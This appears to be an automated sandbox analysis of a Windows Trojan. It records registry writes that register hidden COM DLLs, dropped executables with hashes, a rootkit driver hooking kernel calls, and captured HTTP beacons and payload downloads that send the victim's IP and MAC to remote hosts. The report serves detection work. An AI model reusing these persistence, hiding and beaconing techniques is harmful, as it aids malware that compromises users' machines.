[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 21 DB A2 3F 50 0E C8 7F DF 1E 7E 79 39 36 07"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"

The process shock.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC D9 84 84 31 6F 5C 02 36 47 10 EF 6D 97 A1 DC"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"

[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"

[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\Ymb\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\Ymb\sys32\"

Dropped PE files

MD5 File path
55a3259a59e3c8da70c31447ba869226 c:\WINDOWS\Ymb\deskico\desk.exe
aa6a8b0804c64d9a744478aba1812bf3 c:\WINDOWS\Ymb\lgsoyx.exe
a9e6210e1512d80655643408876f5d7c c:\WINDOWS\Ymb\sys32\shock.dll
e894852596c57675446919411d8fc600 c:\WINDOWS\Ymb\sys32\shock.exe
9d7623b9a5040adb22ce80f31561ee9a c:\WINDOWS\Ymb\sys32\urlnav.dll
52b42aa6637c5e7e7a1fa38d8ad3147e c:\WINDOWS\jwxf\MainPro.exe
dde8a18d882ec61bffba5ce09fd3ede8 c:\WINDOWS\jwxf\MainProX.exe
99c87fbd1328657083180cc0a1c01d01 c:\WINDOWS\jwxf\yp.exe
4540f263d05608dcd3eb0affc059bac5 c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 152808 153088 4.64164 22ced87f8cfbeec19f10ea768b9f5033
.rdata 159744 20275 20480 3.68225 9aea8072fe8459f1fb075382c5799ef0
.data 180224 136672 5120 1.76573 5aafebbc10957e661762e0e7fadc057b
.rsrc 319488 22204 22528 3.49153 0262b31b1b6e8cd4bbbefdfbece199d6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://116.255.243.151/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930
hxxp://saichi.chinacloudapp.cn/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9
hxxp://saichi.chinacloudapp.cn/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1
hxxp://saichi.chinacloudapp.cn/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793
hxxp://saichi.chinacloudapp.cn/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905
hxxp://saichi.chinacloudapp.cn/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9
hxxp://saichi.chinacloudapp.cn/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28
hxxp://saichi.chinacloudapp.cn/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675
hxxp://saichi.chinacloudapp.cn/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/cfg.ini
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/178.ico
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/190.ico
hxxp://cc00080.h.cnc.ccgslb.com.cn/desk/ico/184.ico
hxxp://saichi.chinacloudapp.cn/txt/list666_20150402170229.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED
hxxp://log.soomeng.com/deskcount?31252A4A412B46731A5D48327378652739263A700E590D0C4B0822 115.238.251.56
hxxp://sc.p2ptool.com/txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 42.159.29.153
hxxp://plus.zzinfor.cn/plus/config/wuwei8896.1.bin?ver=3.180&lip=192.168.220.134&mac=000C293FC930
hxxp://sc.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 42.159.29.153
hxxp://pro.52icafe.com/desk/ico/178.ico 61.240.135.44
hxxp://pro.52icafe.com/desk/ico/184.ico 61.240.135.44
hxxp://sc.p2ptool.com/txt/deskico_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F567147B1655CC25D70B4FAAF165D793 42.159.29.153
hxxp://sc.p2ptool.com/txt/multi_150401a.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=F1C5E71158F2AA48584F3E420C9C8905 42.159.29.153
hxxp://sc.p2ptool.com/txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 42.159.29.153
hxxp://sc.p2ptool.com/txt/listsf_20150403180242.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=6800044940E2E0AB155EC34DEDF2EFE7 42.159.29.153
hxxp://pro.52icafe.com/desk/ico/190.ico 61.240.135.44
hxxp://pro.52icafe.com/desk/cfg.ini 61.240.135.44
hxxp://sc.p2ptool.com/txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 42.159.29.153
hxxp://sc.p2ptool.com/txt/listbc_20150404215834.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=89C04AF80E849FEC0059588AF9D40675 42.159.29.153


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /txt/popup_150319.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=E78BD29551CC149059A4133F8BDD55B1 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 1446584
Last-Modified: Thu, 19 Mar 2015 08:35:59 GMT
Connection: close
ETag: "550a8a6f-1612b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WsE8FbgoIUwpwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKkLylKYwrte9DsLM5FucPllBqI zLItKvUi7rq2F
CBqFsOxkH2MqfSv749hq2FwRlndZ00VMyWqzJ/xxHG3la/wJfU2d3xaCkTmuEeFluFMl7A
 zf9Ag4606gmB7izB9dFky/01vE3mMTazQ2ZSPlrxNrNDZlI Wvl VctcLkkfUPVr1iHDb
W5jPiHcrQA6UXLJiZU1pmi12TbqVDGLavoOy6LkFdeCINdwTSf310bhZcnJ9A2kE61ib4B
GLVKgG2JvgEYtUqAbXY6hqdQ2cLLUY8yWnM/JlTrDGibnVV5VusMaJudVXlWUSYbyFUa7k
TE2s0NmUj5a1nmUDjllD1akaHXA5ON2pzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsK hEE
jcLC6cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtP/iDIiRP218
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvLL1A4u6E4zsbEYRbm5uwDsTazQ2Z
SPlrMTh1JATqEXdpXqYSlmNk9YGRwYXr/5B62mAps5IXtyfE2s0NmUj5a qSnCa1jASD9a
oTtByytZbx9M823IT9dsbPFnfe4DzTxNrNDZlI WtwtiPSWquUIj9Gncu4pZZY04U68xaD
harxMH0Rg6RlqsTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a2wNi2SICdTxt5q/7FrJX T02MilBFZI5BN8
9H8kzdMM1wg5aryKKMjyVskrcu QLv2/X5A7iWtC0A4 WNkI2rvOjgcZEb9rUpV5CCcbiO
bIiZ/ISzb LW24uVO0eYtw3wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uGom3ouwhi4W
<<< skipped >>>


GET /txt/First_20140926.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:26 GMT
Content-Type: text/plain
Content-Length: 147468
Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT
Connection: close
ETag: "54251ebc-2400c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIS6yH f1P2yDT7rluBqW2giD4y5yvaIirLOkqQZX
a MIbx7i/hpcIaf85gpuidXx1b3p9sFPCdGlfauukL8n3VGGCFZN cmJD9zwQCS9bOJYls
9jJp/ca4xNrNDZlI Wvl VctcLkkfUViPPzwwZ7PfTmgOKU172htBHTdk3n91KXxuX TID
ozHopeYPJWsYu/iFay305SFOdOmlvW lRm5vx/GiWkbKnm/H8aJaRsqZvlZXSZdb4BrY L
TgBilBfrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a81Tto86JwVL 37qBdmegg
XE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvxbsYtAnHS18TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a 
gQ7yxfKZOvtkRGcCbGyejNisBIg3iBXMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9WHnXYPN
Q7BgK4Gpapi2s/vE2s0NmUj5a qSnCa1jASD9aoTtByytZZN3m8TegecH/B8RyOgTUFbxN
rNDZlI WtwtiPSWquUIj9Gncu4pZZYMEiIQPXrL yZ4gEzkJ3TOMTazQ2ZSPlr6pKcJrWM
BIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8Ta
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>


GET /txt/shock_150108.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=7E2D8122F27E862B2DD7F4F2F7CD39A9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:17 GMT
Content-Type: text/plain
Content-Length: 284000
Last-Modified: Thu, 08 Jan 2015 06:22:57 GMT
Connection: close
ETag: "54ae2241-45560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJZdg29 aaSq5ChwQAReXuq73zZ03xNr0ykJLRLxH
X2w 1JsVwVN93iCWjRKtF1lC0OB91q5UCVkX CgSF0zvN CGW9lWuWh/s//zc/3tOzL6RL
5Mbk/NQRxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxLBeFOtBcslY/dg0 sDpL
F93RaUFkAfs63G0OsoI1dTxYLcfzHzT/d51tXZUFbwHFGXJyfQNpBOtYm ARi1SoBtib4B
GLVKgG0DV4qTUdhfmSJDFWoq8VaT6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
tslujPm19qT 7ANpY7NNxGxNrNDZlI WvE2s0NmUj5axVTR1yl7Wh4SFW6pDBLFWHE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WuoW8230dz3CcTazQ2ZSPlrITDcdtcg4PHE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr2ZKM DeF7JAizyarcgVRXzE2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPVJ0zS6tvj8Khj ky0f66t xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWx 
KJjsrllxMXn TkM1wXQMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWPTHC32lP2yiKbSD/GqS
fVrE2s0NmUj5a qSnCa1jASD 8BgGQTR5rWsfHQ1j7MMGpL7AhrIhxwHxNrNDZlI WtlbV
eP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a1g1uStZN/tZN8nvh42yy5zjYtpOb0ddkzy3
MsKhIRqCv1dWtL7KUyRvBdNzQhkZ7g7ZxcD0GQdewD7gnpXgKvkcIPWgIAauLrgYRRnGkY
Gm/h49sgBiteO8 8Qf/c67uqcUL5XFlPi54GkU/tZooNm/Wfunt1CXI/N0o1JV7j/O
<<< skipped >>>


GET /txt/urlnav_141114.txt?ver=3.180&uid=wuwei8896.1&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: sc.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 04 Apr 2015 18:54:21 GMT
Content-Type: text/plain
Content-Length: 111288
Last-Modified: Fri, 14 Nov 2014 03:29:19 GMT
Connection: close
ETag: "5465770f-1b2b8"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wr
MOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3
TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3
dB7txKLcg4QGva912G4GnwNO6uG0yW9iLynDUHq/HLA1I0Mgx7sTvMrqVegigsaPAMlycn
0DaQTrXm/H8aJaRsqeb8fxolpGypFklHa0IUJrWtj4tOAGKUF sMaJudVXlW6wxom51VeV
ZRJhvIVRruRFx5KEBxs2/8UZSS65y3h1b0AuZLZP47s8TazQ2ZSPlrxNrNDZlI Wukxah1
b3uqqMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk l
eK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7AA7l/dPFp2Oo4QVxT3CU2MTazQ2ZSPlrEk
Yhq4qBTrw/Rp3LuKWWWBNKEt5jwcC0SLZsRYA4Cs/E2s0NmUj5a3C2I9Jaq5QixNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oURZpHHpqzKdokEsJbVR23tr2s6uv3 o5ZREMMJf0vpcLusis07 NvMwA6jAbzQgABzI
bqI92FStaOaeCfpWjRWrVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r
648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ41Wy3 HVsBv5Bepmeh2dZe/TnDXSN51O5
<<< skipped >>>


GET /desk/cfg.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 275
Accept-Ranges: bytes
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 04:49:11 GMT
Last-Modified: Fri, 27 Mar 2015 03:31:20 GMT
ETag: "5514cf08-113"
Expires: Sun, 05 Apr 2015 04:49:11 GMT
Cache-Control: max-age=86400
Age: 50667
Powered-By-ChinaCache: HIT from 060320b3SX
[ico].num=3.[0].Ico_min=178.Ico_max=178.name=.........url=hXXp://g.2ks
m.com/s/1/999/23903.html?uid=505519.[1].Box=0.Ico_min=190.Ico_max=190.
name=.........url=hXXp://uimg.1qwe3r.com/mrcode.php?ai=50511.[2].Box=0
.Ico_min=180.Ico_max=189.name=.........url=hXXp://ico1.fdc321.comt>....


GET /desk/ico/178.ico HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pro.52icafe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Sat, 04 Apr 2015 03:37:34 GMT
Content-Type: image/x-icon
Content-Length: 16958
Last-Modified: Thu, 08 Jan 2015 09:44:44 GMT
ETag: "54ae518c-423e"
Expires: Sun, 05 Apr 2015 03:37:34 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 54965
Powered-By-ChinaCache: HIT from 060320b3SX
......@@.... .(B......(...@......... .................................
.............)@..(?g.(?..*@..*>..-?...?..!3...$......."............
...(..*?..!8.......)..................................................
......................................................................
................f.....................................;^..'?h.(@..'?..
$=..&>..*>..*?..(?..,@..,@..(@..!:...6..";..&=..'>...=...7...
-.....................................................................
......................................................................
.........h.........................Kz..:^..3S..7Z..Fq..T...V.."b.. q..
,w..(z..&w..%q.."q..#q.."s...e...O...C...3x...8...&... ...*...&..."...
......................................................................
..... ....$...........................................................
